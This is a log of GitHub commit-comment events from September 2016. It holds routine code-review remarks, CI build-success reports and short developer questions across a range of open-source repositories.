{"id":"4536126197","type":"CommitCommentEvent","actor":{"login":"dagood"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18951319,"position":63,"line":63,"path":"bootstrap.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T19:26:34Z","updated_at":"2016-09-08T19:26:34Z","body":"Yeah, the way I've done this was having a nuget.config with auth details in it. We could generate that and use `--configfile foo.config` rather than `--source`. (There is no way to pass basic auth as an arg to use with `--source`, and when I asked, NuGet didn't want to add it.)"}},"created_at":"2016-09-08T19:26:34Z"}
{"id":"4536132710","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18951334,"position":null,"line":null,"path":null,"commit_id":"bbe01dc168d518fc06273501d9993f2e6b47c7b7","created_at":"2016-09-08T19:27:48Z","updated_at":"2016-09-08T19:27:48Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.766.bbe01dc168d518fc06273501d9993f2e6b47c7b7](http://build.palaso.org/viewLog.html?buildId=76680&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:55"}},"created_at":"2016-09-08T19:27:48Z"}
{"id":"4536132837","type":"CommitCommentEvent","actor":{"login":"johnslay"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18951335,"position":54,"line":68,"path":"Tests/NSManagedObjectContext+TestSwizzle.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-08T19:27:50Z","updated_at":"2016-09-08T19:27:50Z","body":"@nhgrif Swift 3 gets rid of dispatch_once and I found this implementation on SO, thought you'd want to look at it."}},"created_at":"2016-09-08T19:27:50Z"}
{"id":"4536133266","type":"CommitCommentEvent","actor":{"login":"rkrishnan2012"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18951336,"position":null,"line":null,"path":null,"commit_id":"6291b4e36a9fd9f8ee31d1628ca872b02b1da2f4","created_at":"2016-09-08T19:27:55Z","updated_at":"2016-09-08T19:27:55Z","body":"gotcha. Can I add to the find_apk.sh to decompress this? That way it works out of the box."}},"created_at":"2016-09-08T19:27:55Z"}
{"id":"4536134172","type":"CommitCommentEvent","actor":{"login":"HarmJ0y"},"repo":{"name":"adaptivethreat/BloodHound"},"payload":{"comment":{"id":18951339,"position":null,"line":null,"path":null,"commit_id":"c6ad08a93880e44eba689ee6f286663532cfb354","created_at":"2016-09-08T19:28:05Z","updated_at":"2016-09-08T19:28:05Z","body":"Meatballs1 - my test environment is large enough now that the original code won't even run really, so hard to get before/after ;)\r\n\r\nnullprobe - what section causes the crash, i.e. can you run with -Verbose to let us know where it dies?"}},"created_at":"2016-09-08T19:28:05Z"}
{"id":"4536134173","type":"CommitCommentEvent","actor":{"login":"for1997"},"repo":{"name":"for1997/DjangoPy"},"payload":{"comment":{"id":18951340,"position":null,"line":null,"path":null,"commit_id":"3ee618b5bee3b6653525308da2e64541733fe717","created_at":"2016-09-08T19:28:05Z","updated_at":"2016-09-08T19:28:05Z","body":"template for poster and show "}},"created_at":"2016-09-08T19:28:05Z"}
{"id":"4536134397","type":"CommitCommentEvent","actor":{"login":"c0s"},"repo":{"name":"apache/bigtop"},"payload":{"comment":{"id":18951341,"position":null,"line":null,"path":null,"commit_id":"3bb2e1d2dbaee4f367d5223908ae7918fa17b2b7","created_at":"2016-09-08T19:28:08Z","updated_at":"2016-09-08T19:28:08Z","body":"Thanks for addressing the comments!\r\nAs the final step: we normally are trying to add new components as a set of JIRAs for packaging, deployment, and tests. Could you please split this one into three smaller once, so we can finally get this in? Thanks!"}},"created_at":"2016-09-08T19:28:08Z"}
{"id":"4536136597","type":"CommitCommentEvent","actor":{"login":"Kreyo"},"repo":{"name":"CirnoNineball/whatever"},"payload":{"comment":{"id":18951348,"position":22,"line":26,"path":"index.html","commit_id":"785eda8f30ff957b87246fd1febd87a12885348c","created_at":"2016-09-08T19:28:32Z","updated_at":"2016-09-08T19:28:32Z","body":"Div elements use 100% of the parent width by default, that's why it won't stay on the same line. Use width: (some)px, and possibly float css attr to control it."}},"created_at":"2016-09-08T19:28:32Z"}
{"id":"4536138908","type":"CommitCommentEvent","actor":{"login":"tomusdrw"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18951353,"position":11,"line":10,"path":"js/src/dapps/registry/reducers.js","commit_id":"14e32517068fdf08bc97e8b138582e55c80b0096","created_at":"2016-09-08T19:28:58Z","updated_at":"2016-09-08T19:28:58Z","body":"Seems that this could be helpful? http://redux.js.org/docs/api/combineReducers.html"}},"created_at":"2016-09-08T19:28:58Z"}
{"id":"4536142926","type":"CommitCommentEvent","actor":{"login":"zshamrock"},"repo":{"name":"zshamrock/java-nats-streaming"},"payload":{"comment":{"id":18951357,"position":5,"line":16,"path":"src/test/java/io/nats/stan/STANServer.java","commit_id":"6d5e4733f7d077b679d2dfed0933b3d95ab69eee","created_at":"2016-09-08T19:29:43Z","updated_at":"2016-09-08T19:29:43Z","body":"Appending `./` was the only way to make IT cases to pass. Also I believe it might not be portable, but worked fine on Linux. Otherwise it failed with file doesn't exist/found exception."}},"created_at":"2016-09-08T19:29:43Z"}
{"id":"4536143777","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18951360,"position":null,"line":null,"path":null,"commit_id":"bbe01dc168d518fc06273501d9993f2e6b47c7b7","created_at":"2016-09-08T19:29:53Z","updated_at":"2016-09-08T19:29:53Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.764.bbe01dc168d518fc06273501d9993f2e6b47c7b7](http://build.palaso.org/viewLog.html?buildId=76681&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:57"}},"created_at":"2016-09-08T19:29:53Z"}
{"id":"4536144372","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18951361,"position":null,"line":null,"path":null,"commit_id":"16165072b331161e88fe9abddb8e0eab7be93227","created_at":"2016-09-08T19:30:00Z","updated_at":"2016-09-08T19:30:00Z","body":"Yeah I also were confused why it didn't work for me."}},"created_at":"2016-09-08T19:30:00Z"}
{"id":"4536144463","type":"CommitCommentEvent","actor":{"login":"ssumpf"},"repo":{"name":"genodelabs/genode"},"payload":{"comment":{"id":18951362,"position":null,"line":null,"path":null,"commit_id":"d8ceef10e235daee2c0e4e55fdf3974c694b977d","created_at":"2016-09-08T19:30:01Z","updated_at":"2016-09-08T19:30:01Z","body":"... and thanks to @702nADOS for reporting it."}},"created_at":"2016-09-08T19:30:01Z"}
{"id":"4536153214","type":"CommitCommentEvent","actor":{"login":"zaincbs"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":18951378,"position":11,"line":11,"path":"cat.py","commit_id":"2142206ce13259d3156cc17f0f42f42f79d5704d","created_at":"2016-09-08T19:31:43Z","updated_at":"2016-09-08T19:31:43Z","body":"Return v and print it in the main.\r\n"}},"created_at":"2016-09-08T19:31:43Z"}
{"id":"4536155925","type":"CommitCommentEvent","actor":{"login":"tomusdrw"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":18951381,"position":16,"line":20,"path":"js/src/dapps/registry/reducers.js","commit_id":"14e32517068fdf08bc97e8b138582e55c80b0096","created_at":"2016-09-08T19:32:15Z","updated_at":"2016-09-08T19:32:15Z","body":"I would prefer `action.type.indexOf('lookup') === 0` here:)\r\n\r\nAlso this might help:\r\n```js\r\nconst countReducer = createReducer(3, {\r\n  ['lookup a'](state) {\r\n    return state + 1;\r\n  },\r\n  ['lookup b'](state) {\r\n    return state - 1;\r\n  }\r\n});\r\n\r\nfunction createReducer(initialState, clazz) {\r\n  return function reducer(state = initialState, action) {\r\n    if (clazz[action.type]) {\r\n      return clazz[action.type](state, action);\r\n    }\r\n    return state;\r\n  };\r\n}\r\n```\r\n"}},"created_at":"2016-09-08T19:32:15Z"}
{"id":"4536161900","type":"CommitCommentEvent","actor":{"login":"93r"},"repo":{"name":"wbraswell/rperl"},"payload":{"comment":{"id":18951392,"position":null,"line":null,"path":null,"commit_id":"bd51fdc0b5794e2fd2bd9bebbd21de6fb79ba42a","created_at":"2016-09-08T19:33:25Z","updated_at":"2016-09-08T19:33:25Z","body":"Test are still failing under Appveyor but they are not hanging anymore. At least my local and my Appveyor tests are not hanging anymore."}},"created_at":"2016-09-08T19:33:25Z"}
{"id":"4536164168","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"ChronoTensai/sdl2tetris"},"payload":{"comment":{"id":18951397,"position":17,"line":56,"path":"Project1/Project1/Sprite.cpp","commit_id":"0d2e8acb5d54a1e4fa9b58a7927593c1d5252659","created_at":"2016-09-08T19:33:53Z","updated_at":"2016-09-08T19:33:53Z","body":" Sprite::Sprite(SDL_Texture* srcTexture, SDL_Rect rect)\r\n {\r\n \tdrawed = false;\r\n \tRect = rect;\r\n \tsourceTexture =  SDL_CreateTexture();\r\n }\r\n"}},"created_at":"2016-09-08T19:33:53Z"}
{"id":"4536170934","type":"CommitCommentEvent","actor":{"login":"el-mapache"},"repo":{"name":"18F/federalist"},"payload":{"comment":{"id":18951411,"position":8,"line":13,"path":"assets/app/actions/siteActions.js","commit_id":"e2edd9467187ae4e591fec913ae885ec766448e1","created_at":"2016-09-08T19:35:15Z","updated_at":"2016-09-08T19:35:15Z","body":"Just a heads up! This has been abstracted into its own action, since its conceivable that many actions might want to update the state of the router once they've finished their work.  \r\n\r\nI believe it's in the draft preview branch https://github.com/18F/federalist/pull/492"}},"created_at":"2016-09-08T19:35:15Z"}
{"id":"4536174506","type":"CommitCommentEvent","actor":{"login":"reisenberger"},"repo":{"name":"brunolauze/Polly"},"payload":{"comment":{"id":18951418,"position":27,"line":33,"path":"src/Polly.Shared/Throttle/ThrottleEngine.cs","commit_id":"6e1c3c6ce16fe17cb66eee7109f5b359c68199be","created_at":"2016-09-08T19:35:55Z","updated_at":"2016-09-08T19:35:55Z","body":"It is essential we `Release()` every semaphore we earlier acquire.  So I think this `Release()` needs to be in a `finally { }`, whose `try { }` contains anything that could go wrong between acquisition and release.   Do you agree?"}},"created_at":"2016-09-08T19:35:55Z"}
{"id":"4536175207","type":"CommitCommentEvent","actor":{"login":"gabsy3"},"repo":{"name":"oved27/F.U.S"},"payload":{"comment":{"id":18951423,"position":null,"line":null,"path":null,"commit_id":"0d29622af789a3d2fd32d0f21825b46779090c93","created_at":"2016-09-08T19:36:03Z","updated_at":"2016-09-08T19:36:03Z","body":"oveddddd"}},"created_at":"2016-09-08T19:36:03Z"}
{"id":"4536176898","type":"CommitCommentEvent","actor":{"login":"DracoMilesX"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18951430,"position":6,"line":6,"path":"src/models/Player/Party/index.js","commit_id":"8435544963da0736c61708200dff5c46f8c1596b","created_at":"2016-09-08T19:36:23Z","updated_at":"2016-09-08T19:36:23Z","body":"You need an additional ../ for the cfg."}},"created_at":"2016-09-08T19:36:23Z"}
{"id":"4536177319","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18951431,"position":null,"line":null,"path":null,"commit_id":"7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899","created_at":"2016-09-08T19:36:26Z","updated_at":"2016-09-08T19:36:26Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.765.7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899](http://build.palaso.org/viewLog.html?buildId=76687&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:27"}},"created_at":"2016-09-08T19:36:26Z"}
{"id":"4536177413","type":"CommitCommentEvent","actor":{"login":"robbee"},"repo":{"name":"twigy/twigy-web"},"payload":{"comment":{"id":18951432,"position":null,"line":null,"path":null,"commit_id":"7a09ed526df09a678f5cb542d1cc01fb4c1f91cb","created_at":"2016-09-08T19:36:28Z","updated_at":"2016-09-08T19:36:28Z","body":"Ah oui .. c'etait pas bien compliqué... je pensais qu'il fallait passer par le controller et tout et tout ... Merci !"}},"created_at":"2016-09-08T19:36:28Z"}
{"id":"4536177479","type":"CommitCommentEvent","actor":{"login":"cysjonathan"},"repo":{"name":"cysjonathan/coursemology2"},"payload":{"comment":{"id":18951434,"position":null,"line":null,"path":null,"commit_id":"81b33d1094e088b52550e27aa9c2cea5a499670f","created_at":"2016-09-08T19:36:28Z","updated_at":"2016-09-08T19:36:28Z","body":"Changed forum latest post format\r\n![selection_033](https://cloud.githubusercontent.com/assets/10083037/18363873/8b818aee-763e-11e6-8fc7-ad88fc018773.png)"}},"created_at":"2016-09-08T19:36:28Z"}
{"id":"4536183264","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18951448,"position":null,"line":null,"path":null,"commit_id":"5101b05682ba5136aabe3764a33f0ae20156abc0","created_at":"2016-09-08T19:37:36Z","updated_at":"2016-09-08T19:37:36Z","body":"@CoolCanuck PR then."}},"created_at":"2016-09-08T19:37:36Z"}
{"id":"4536184997","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18951450,"position":null,"line":null,"path":null,"commit_id":"7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899","created_at":"2016-09-08T19:37:58Z","updated_at":"2016-09-08T19:37:58Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.767.7c7e5eed0a3d9c8a961b01887cbdebbf1b63b899](http://build.palaso.org/viewLog.html?buildId=76686&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:07:56"}},"created_at":"2016-09-08T19:37:58Z"}
{"id":"4536185561","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18951453,"position":3,"line":3,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-08T19:38:06Z","updated_at":"2016-09-08T19:38:06Z","body":"?"}},"created_at":"2016-09-08T19:38:06Z"}
{"id":"4536187550","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18951456,"position":4,"line":3,"path":"otrv4.md","commit_id":"2762fe8069bf5bd422061add8780731c137c8df4","created_at":"2016-09-08T19:38:29Z","updated_at":"2016-09-08T19:38:29Z","body":"Why this change? Can you guarantee that it allows that?"}},"created_at":"2016-09-08T19:38:29Z"}
{"id":"4536192057","type":"CommitCommentEvent","actor":{"login":"el-mapache"},"repo":{"name":"18F/federalist"},"payload":{"comment":{"id":18951468,"position":31,"line":31,"path":"test/client/app/actions/siteActionsTest.js","commit_id":"e2edd9467187ae4e591fec913ae885ec766448e1","created_at":"2016-09-08T19:39:22Z","updated_at":"2016-09-08T19:39:22Z","body":"I am curious, what would the best practice be here for minimizing dependencies? \r\nAt a minimum the siteActions requires some number of action types, a reference to the store, and an api to interact with.\r\n\r\nWhat sort of abstraction would be useful for breaking out dependencies like the alert or navigation actions?\r\n\r\nJeremia and I had been discussing breaking out github specific actions and federalist site specific actions, which would remove one dependency at least."}},"created_at":"2016-09-08T19:39:22Z"}
{"id":"4536192063","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18951469,"position":11,"line":5,"path":"otrv4.md","commit_id":"2762fe8069bf5bd422061add8780731c137c8df4","created_at":"2016-09-08T19:39:22Z","updated_at":"2016-09-08T19:39:22Z","body":"This paragraph is a bit off. It seems to say that you cannot transfer the identity to another party."}},"created_at":"2016-09-08T19:39:22Z"}
{"id":"4536194967","type":"CommitCommentEvent","actor":{"login":"maierfelix"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18951477,"position":6,"line":6,"path":"src/models/Player/Party/index.js","commit_id":"8435544963da0736c61708200dff5c46f8c1596b","created_at":"2016-09-08T19:39:57Z","updated_at":"2016-09-08T19:39:57Z","body":"Failed that, thanks for pointing out"}},"created_at":"2016-09-08T19:39:57Z"}
{"id":"4536197408","type":"CommitCommentEvent","actor":{"login":"jiaxil"},"repo":{"name":"jiaxil/EDM-Day1"},"payload":{"comment":{"id":18951492,"position":null,"line":null,"path":null,"commit_id":"6da32675e2900c4acdc083abb76700f8d88c67c6","created_at":"2016-09-08T19:40:25Z","updated_at":"2016-09-08T19:40:25Z","body":"what is this file?\r\n"}},"created_at":"2016-09-08T19:40:25Z"}
{"id":"4536197983","type":"CommitCommentEvent","actor":{"login":"franciscoj"},"repo":{"name":"teambox/omniauth-redbooth"},"payload":{"comment":{"id":18951496,"position":null,"line":null,"path":null,"commit_id":"162e4b1e105678c0d1dd938f49ba75974a2b2352","created_at":"2016-09-08T19:40:32Z","updated_at":"2016-09-08T19:40:32Z","body":"That's cool, thank you!"}},"created_at":"2016-09-08T19:40:32Z"}
{"id":"4536199601","type":"CommitCommentEvent","actor":{"login":"dooleysm"},"repo":{"name":"paniagua/slate"},"payload":{"comment":{"id":18951500,"position":2,"line":3,"path":"source/includes/engagements.md","commit_id":"c73f7e5801a1ec8d32ab365f1c680afa928d8867","created_at":"2016-09-08T19:40:51Z","updated_at":"2016-09-08T19:40:51Z","body":"Feel like these headings should be \"Get All Engagements\" or something like that since navigating on left using the name.  This could be the line right below as a subtitle but might improve navigation.  Thoughts?"}},"created_at":"2016-09-08T19:40:51Z"}
{"id":"4536200734","type":"CommitCommentEvent","actor":{"login":"LeandroRoberto"},"repo":{"name":"interlegis/sapl"},"payload":{"comment":{"id":18951506,"position":19,"line":68,"path":"sapl/base/views.py","commit_id":"bc9b7c177f6c3e22f7e6510073a9121256b4d267","created_at":"2016-09-08T19:41:06Z","updated_at":"2016-09-08T19:41:06Z","body":"Do ponto de vista da implementação... tirar o len e o value_list, colocar transformar o distinct em distinct('sessao_plenaria').count() é, de longe mais eficiente... "}},"created_at":"2016-09-08T19:41:06Z"}
{"id":"4536203465","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18951531,"position":null,"line":null,"path":null,"commit_id":"5853d4fbbd6fb83e057209564c56193fa847d41e","created_at":"2016-09-08T19:41:34Z","updated_at":"2016-09-08T19:41:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fl8EJrZDQ22g0ZZdTFqJog"}},"created_at":"2016-09-08T19:41:34Z"}
{"id":"4536206053","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18951542,"position":20,"line":157,"path":"starter.js","commit_id":"f9695e768ca1f60631e7835cc70f89fa0cc399cd","created_at":"2016-09-08T19:42:06Z","updated_at":"2016-09-08T19:42:06Z","body":"effectivement, après réflexion la confusion vient du fait qu'on utilise JBJ.inject...\r\nstylesheet< produira une clé \"stylesheet\" contenant la  valeur de cellule. ça fait bizarre à l'usage.\r\nJe pense juste que c'était mieux avant... En plus potentiellement avec cette technique on pourrait rendre chaque propriété de la colonne dynamique... \r\n\r\n\r\n\r\n"}},"created_at":"2016-09-08T19:42:06Z"}
{"id":"4536209613","type":"CommitCommentEvent","actor":{"login":"zhx828"},"repo":{"name":"zhx828/iViz"},"payload":{"comment":{"id":18951556,"position":null,"line":null,"path":null,"commit_id":"3911dbeb9e23ae9439f14729f08a985284c8763d","created_at":"2016-09-08T19:42:48Z","updated_at":"2016-09-08T19:42:48Z","body":"This commit solves #197"}},"created_at":"2016-09-08T19:42:48Z"}
{"id":"4536210293","type":"CommitCommentEvent","actor":{"login":"LeandroRoberto"},"repo":{"name":"interlegis/sapl"},"payload":{"comment":{"id":18951557,"position":25,"line":74,"path":"sapl/base/views.py","commit_id":"bc9b7c177f6c3e22f7e6510073a9121256b4d267","created_at":"2016-09-08T19:42:55Z","updated_at":"2016-09-08T19:42:55Z","body":"vale os comentários anteriores sobre a lógica da implementação... sobre a semântica: o total de ordens obtido não é o correto!"}},"created_at":"2016-09-08T19:42:55Z"}
{"id":"4536210784","type":"CommitCommentEvent","actor":{"login":"CSpenz412"},"repo":{"name":"GoelBiju/pinybot"},"payload":{"comment":{"id":18951559,"position":null,"line":null,"path":null,"commit_id":"3e12291e18e5c1563857e0434509213010ac4281","created_at":"2016-09-08T19:43:01Z","updated_at":"2016-09-08T19:43:01Z","body":"i'm so confused it keeps telling me i dont have pyamf can someone please help me with this?"}},"created_at":"2016-09-08T19:43:01Z"}
{"id":"4536210839","type":"CommitCommentEvent","actor":{"login":"dooleysm"},"repo":{"name":"paniagua/slate"},"payload":{"comment":{"id":18951560,"position":31,"line":123,"path":"source/includes/engagements.md","commit_id":"c73f7e5801a1ec8d32ab365f1c680afa928d8867","created_at":"2016-09-08T19:43:02Z","updated_at":"2016-09-08T19:43:02Z","body":"Is there anything we can do about the table columns widths and allowing text to wrap better.  Seems like it cuts off text mid-word \"start_date\" in third row description field as example."}},"created_at":"2016-09-08T19:43:02Z"}
{"id":"4536212584","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18951562,"position":112,"line":112,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-08T19:43:22Z","updated_at":"2016-09-08T19:43:22Z","body":"Yes, if we could define groups that would be excluded unless specifically requested (without using quarantine), i.e. LDAP, Kerberos, S3, that would be much more convenient."}},"created_at":"2016-09-08T19:43:22Z"}
{"id":"4536215499","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18951576,"position":null,"line":null,"path":null,"commit_id":"6c0319fa685fecb14fe5815baa94ade2d7e48131","created_at":"2016-09-08T19:43:55Z","updated_at":"2016-09-08T19:43:55Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2282 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.54%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T19:43:55Z"}
{"id":"4536216534","type":"CommitCommentEvent","actor":{"login":"reisenberger"},"repo":{"name":"brunolauze/Polly"},"payload":{"comment":{"id":18951580,"position":24,"line":30,"path":"src/Polly.Shared/Throttle/ThrottleEngine.cs","commit_id":"6e1c3c6ce16fe17cb66eee7109f5b359c68199be","created_at":"2016-09-08T19:44:10Z","updated_at":"2016-09-08T19:44:10Z","body":"Reading the [SemaphoreSlim reference source](http://referencesource.microsoft.com/#mscorlib/system/threading/SemaphoreSlim.cs,d57f52e0341a581f), it looks like `SemaphoreFullException` means something entirely different.  We probably need to throw a custom exception we create (`SemaphoreRejectedException` maybe better than name in my original proposal?)\r\n\r\nI propose "}},"created_at":"2016-09-08T19:44:10Z"}
{"id":"4536219758","type":"CommitCommentEvent","actor":{"login":"CSpenz412"},"repo":{"name":"GoelBiju/pinybot"},"payload":{"comment":{"id":18951590,"position":null,"line":null,"path":null,"commit_id":"8afcbbb7dd120da7a8743651f2a24c199b9ca8f8","created_at":"2016-09-08T19:44:42Z","updated_at":"2016-09-08T19:44:42Z","body":"it keeps telling me i dont have a pyamf can someone walk me through or teamview with me and sort this?\r\n"}},"created_at":"2016-09-08T19:44:42Z"}
{"id":"4536223681","type":"CommitCommentEvent","actor":{"login":"reisenberger"},"repo":{"name":"brunolauze/Polly"},"payload":{"comment":{"id":18951598,"position":25,"line":31,"path":"src/Polly.Shared/Throttle/ThrottleEngine.cs","commit_id":"6e1c3c6ce16fe17cb66eee7109f5b359c68199be","created_at":"2016-09-08T19:45:27Z","updated_at":"2016-09-08T19:45:27Z","body":"Looks from .NET doco as if `.Wait(...)` returns a bool, so need to respond to return result and throw our custom exception?"}},"created_at":"2016-09-08T19:45:27Z"}
{"id":"4536223931","type":"CommitCommentEvent","actor":{"login":"vojtek-unified"},"repo":{"name":"eudisd/jobber"},"payload":{"comment":{"id":18951599,"position":12,"line":16,"path":"README.md","commit_id":"83ad0f4d617525ae64f6edea5cdf85a64f07acb6","created_at":"2016-09-08T19:45:30Z","updated_at":"2016-09-08T19:45:30Z","body":"Developer is spelled wrong! :+1: "}},"created_at":"2016-09-08T19:45:30Z"}
{"id":"4536226984","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18951606,"position":null,"line":null,"path":null,"commit_id":"3040e398ec06560719639565e7dd86e891f84b9d","created_at":"2016-09-08T19:46:06Z","updated_at":"2016-09-08T19:46:06Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#JJ78wTCQS-SquEejdmbJ3Q"}},"created_at":"2016-09-08T19:46:06Z"}
{"id":"4536230144","type":"CommitCommentEvent","actor":{"login":"chrissprague"},"repo":{"name":"rit-csc/CSCWebsite"},"payload":{"comment":{"id":18951621,"position":7,"line":74,"path":"csc_new/pages/templates/pages/about.html","commit_id":"32873918d62aba528576de721369e31357f55869","created_at":"2016-09-08T19:46:42Z","updated_at":"2016-09-08T19:46:42Z","body":"ha"}},"created_at":"2016-09-08T19:46:42Z"}
{"id":"4536231014","type":"CommitCommentEvent","actor":{"login":"stelleg"},"repo":{"name":"Qthreads/qthreads"},"payload":{"comment":{"id":18951622,"position":null,"line":null,"path":null,"commit_id":"71c812a2c5215d691273f921ef6a1f2970c19d6d","created_at":"2016-09-08T19:46:52Z","updated_at":"2016-09-08T19:46:52Z","body":"Which scheduler?"}},"created_at":"2016-09-08T19:46:52Z"}
{"id":"4536232046","type":"CommitCommentEvent","actor":{"login":"maieul"},"repo":{"name":"maieul/biblatex-bookinarticle"},"payload":{"comment":{"id":18951623,"position":null,"line":null,"path":null,"commit_id":"1551842d86a438edc73cb79d0e9c5ee5ba1e4bc6","created_at":"2016-09-08T19:47:06Z","updated_at":"2016-09-08T19:47:06Z","body":"it was @doc73, not @doc33"}},"created_at":"2016-09-08T19:47:06Z"}
{"id":"4536233885","type":"CommitCommentEvent","actor":{"login":"akonwi"},"repo":{"name":"sharedprophet/git-plus"},"payload":{"comment":{"id":18951632,"position":null,"line":null,"path":null,"commit_id":"67a037b2c61ee64044c03271cd58e84a7afaf584","created_at":"2016-09-08T19:47:25Z","updated_at":"2016-09-08T19:47:25Z","body":"Perhaps keeping this behind the experimental toggle isn't necessary then if it'll just be the syntax highlighting that's toggled. I'll push your original commit soon"}},"created_at":"2016-09-08T19:47:25Z"}
{"id":"4536235271","type":"CommitCommentEvent","actor":{"login":"jlonergan35"},"repo":{"name":"jlonergan35/Shiny-bin-maker"},"payload":{"comment":{"id":18951639,"position":null,"line":null,"path":null,"commit_id":"bbb000eccf96917cd5e20c0f5da0a7d506310ddf","created_at":"2016-09-08T19:47:41Z","updated_at":"2016-09-08T19:47:41Z","body":"This file contains the entire station code database\r\n"}},"created_at":"2016-09-08T19:47:41Z"}
{"id":"4536235944","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"castorjs/castor-core"},"payload":{"comment":{"id":18951642,"position":null,"line":null,"path":null,"commit_id":"76e93f6cba89a19fe2f9e1ee6a4e88751481364a","created_at":"2016-09-08T19:47:49Z","updated_at":"2016-09-08T19:47:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WVzCJXnu&#x2F;6-dans-la-configuration-des-collectionsfields-datasetfiels-mettre-le-code-jbj-dans-une-varaiable-nommee-stylesheet-et-pas-directem\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Dans la configuration des collectionsFields &#x2F; datasetFiels &#x2F; ... mettre le code JBJ dans une varaiable nommée stylesheet et pas directement dans content&lt;</a>"}},"created_at":"2016-09-08T19:47:49Z"}
{"id":"4536237979","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"coq/coq"},"payload":{"comment":{"id":18951650,"position":14,"line":172,"path":"ltac/profile_ltac.ml","commit_id":"1f358573df98358237b9af2a3ff48c99d8be0686","created_at":"2016-09-08T19:48:12Z","updated_at":"2016-09-08T19:48:12Z","body":"What does the `v 0` do here?"}},"created_at":"2016-09-08T19:48:12Z"}
